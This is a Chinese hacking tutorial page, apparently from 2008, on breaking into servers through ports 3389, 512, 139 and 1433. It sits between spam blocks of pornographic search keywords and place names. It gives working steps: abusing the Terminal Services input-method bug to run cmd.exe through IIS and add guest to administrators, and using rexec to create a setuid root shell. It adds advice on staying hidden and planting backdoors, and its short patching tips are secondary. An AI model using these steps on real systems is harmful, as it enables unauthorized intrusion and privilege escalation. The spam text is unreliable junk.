最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

實例解析80、512、3389等端口的入侵

互聯網   發(fā)布時間:2008-10-08 19:36:05   作者:佚名   我要評論
有很多網站為了安全起見,在WEB Server前面架了防火墻,或者做了TCP/IP過濾,對外只開放TCP 80端口。從入侵者角度來看,要入侵那么從80上跑的CGI入手是比較可行的,當然也可以用別的辦法,例如旁敲側擊,呵呵。從網管角度來看,一是要保證CGI的安全性,另外網絡的整體安全
3389端口的入侵
                 
  由于微軟對中國產品不付責任的態(tài)度,使得安裝了終端服務和全拼的w2k服務器存在著遠程登陸并能獲取超級用戶權限的嚴重漏洞。
  其過程如下:
                 
  1.掃描3389 port終端服務默認;2.用終端客戶端程序進行連接;3.按ctrl shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發(fā)灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;4.在“選項”菜單上點右鍵——>跳轉到URL“,輸入:c:winntsystem32cmd.exe.(如果不能確定NT系統目錄,則輸入:c:或d:……進行查找確定);5.選擇”保存到磁盤“選擇目錄:c:inetpubs,因實際上是對方服務器上文件自身的復制操作,所以這個過程很快就會完成;6.打開IE,輸入:http://ip/s/cmd.exe?/c dir怎么樣?有cmd.exe文件了吧?這我們就完成了第一步;7.http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat 8.http://ip/s/cmd.exe?/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe?/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe?/c type go.bat看看我們的批文件內容是否如下:
                 
  net user guest /active:yes net user guest elise net localgroup administrators /add guest 11.在“選項”菜單上點右鍵——>跳轉到URL“,輸入:c:inetpubsgo.bat ——>在磁盤當前位置執(zhí)行;12.呵呵,大功告成啦,這樣我們就激活了服務器的geust帳戶,密碼為:elise,超級用戶呢?。ㄎ蚁矚gguest而不是建立新帳戶,這樣似乎不易被發(fā)現些),這樣你就可用IPC$連接,想怎樣做就怎樣做了,當然,你也可用guest直接登陸到他的服務器,到他機器上去跳舞吧:-)
                 
  注意事項:1.當你用終端客戶端程序登陸到他的服務器時,你的所有操作不會在他的機器上反應出來,但如果他正打開了終端服務管理器,你就慘了了:(這時他能看到你所打開的進程id、程序映象,你的ip及機器名,并能發(fā)消息給你!
  2.當你連接時,會加重對方服務器的負荷,非常容易造成對方死機和斷線,所以你的操作快點為妙。
  3.盡快做好后門,暫時不要上傳任何程序,一是防止斷線,二是防止對方打上補??!
  個人觀點:1.在IE下,所擁有的只是iusr_machine權限,因而,你不要設想去做越權的事情,如啟動telnet、木馬等;2.url的跳轉下,你將擁有超級用戶的權限,好好利用吧3.跳轉到哪個目錄下,通常只能查看、執(zhí)行當前目錄的文件,不能進入到子目錄,如想進入,再跳一次吧?。海?
  4.此法似乎與對方的防火墻無關哦!
  5.據本人實際操作,發(fā)現極易斷線,但應與占用服務器資源無關。對方是384M RAM PIII,是靜態(tài)IP,主要是做數據庫服務器,RAID硬盤,SCSI CD ROM,開機18天了,02:00進去時,仍時常吊線。
                 
  堵漏辦法:1.打補??;2.刪掉全拼輸入法,用標準就成了嘛^_^;3.服務中關掉:Terminal Services,服務名稱:TermService,對應程序名:system32termsrv.exe;
                 
                 
  512端口入侵
                 
  已經是第六十幾天了,我的Celeron 533仍不知疲倦的跑著JOHN……我是無意中注意到這個網站的,當時只是想看一下,方法是各位大蝦都會的FINGER,然后猜用戶口令進去的。進去之后PASSWD也沒有SHADOWN,直接就可以看到,該系統用的是Digital unix系統,從PASSWD看得出里面的用戶只有兩個組:root和users,我猜中的就是一users級別的,發(fā)現這個級別的用戶幾乎沒有什么權限,TELNET上去后發(fā)現/USR/USERS/XXX是各用戶的HOME,而它們的屬性全是drwx——,也就是說這里的用戶是互不信任的關系(這一點大家在各免費主頁服務器上經??梢钥吹剑磥聿鲁鲈俣嘤脩艏壙诹钜矝]有用的。
                 
                 
  root級的用戶只有兩名:root和shut.root我用john已跑了60多天,顯然不可能再跑出來了,但幸運的是shut口令已跑出來了。我毫不猶豫的telnet上去——然后,網站就關閉了!@#~!#^%,我真笨,怎么沒想到shut口令是干什么的?
                 
                 
  網站很快就又開啟了,我發(fā)現shut口令還是沒改!這個網管是怎么當的,系統關了也不查一下原因!很顯然,這個網站上只有root是有水平的,但他與服務器可能不在同地,對于開、關機之類的事情不能直接操縱,與是給當地的操作員一個root級帳號,然后在。profile文件中做了一個shell,使得帳號一登錄就自動關系統??纯聪到y這么周密的設計,我想root設計這個shell時絕對關掉了path,所以我不打算在優(yōu)先的path路徑中放一同名的shell來阻止它。我如果能改掉這個文件再telnet上去不就是root級了嗎?
                 
  但是shut的HOME目錄是drwx——,別的帳號根本進不去。沒關系,我試試ftp,530 user shut access denined(被拒絕),users組可以ftp上去同樣進不了shut目錄。而且該網站根本就沒有開WWW服務,怎么辦?為這個網站陸陸續(xù)續(xù)研究了許久,我總是樂觀的鼓勵自己,“起碼我已經知道幾十種進不去的方法了……”。“真正的黑客從來都是把困難當作樂趣,敞開的大門你請他進他都不進呢!”如此六十多天過去了,只到有一天……
                 
  我再一次用haktek掃描該網站,結果如下:Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.
                 
  一個以前一直沒有注意的Port 512引起我的注意,這個端口是什么時候開的?要知道它可以讓用戶不登錄就可以運行服務器上的命令?。。≮s緊試試!
                 
  打開一個軟件winrsh32,填入user和password,在命令中填上ls -la,點運行哇,文件全列出來了,剩下的就簡單了:cp /bin/sh /tmp/.temp;chown root /tmp/.temp;chmod 4755 /tmp/.temp.然后再用那個破掉的user級帳號telnet,cd/tmp;。temp.當#映入眼簾時,心卻往下一沉,我突然感到一絲落寂……可惜這個root一世小心,卻毀在了讓shut可以使用512端口上??磥砥茐囊粋€世界總是比建立一個世界簡單……
  39端口入侵139端口入侵139端口的入侵,主要是通過建立空連接,而獲得用戶名和共享名,接著用字典法或窮舉法來猜測ADMINISTRATORS的密碼,這樣可獲得最高權限。
  解決方法:1、禁止匿名共享。
  2、禁止管理共享。
  1433端口入侵1433端口入侵1433端口的入侵,主要是利用MS SQL SERVER默認sa的密碼是空,通過遠程執(zhí)行命令而達到目的,或通過窮舉法猜測密碼

相關文章

最新評論

泰来县| 乌什县| 巴东县| 南城县| 永吉县| 天水市| 广平县| 射洪县| 蓝山县| 东城区| 嘉善县| 鹤庆县| 安达市| 贺兰县| 怀安县| 博乐市| 垣曲县| 博兴县| 宣威市| 盐城市| 中牟县| 普安县| 格尔木市| 紫云| 环江| 军事| 清水河县| 灵台县| 卢龙县| 焉耆| 桃园市| 视频| 洪湖市| 兰溪市| 黄浦区| 马关县| 大理市| 梅河口市| 右玉县| 永登县| 靖西县|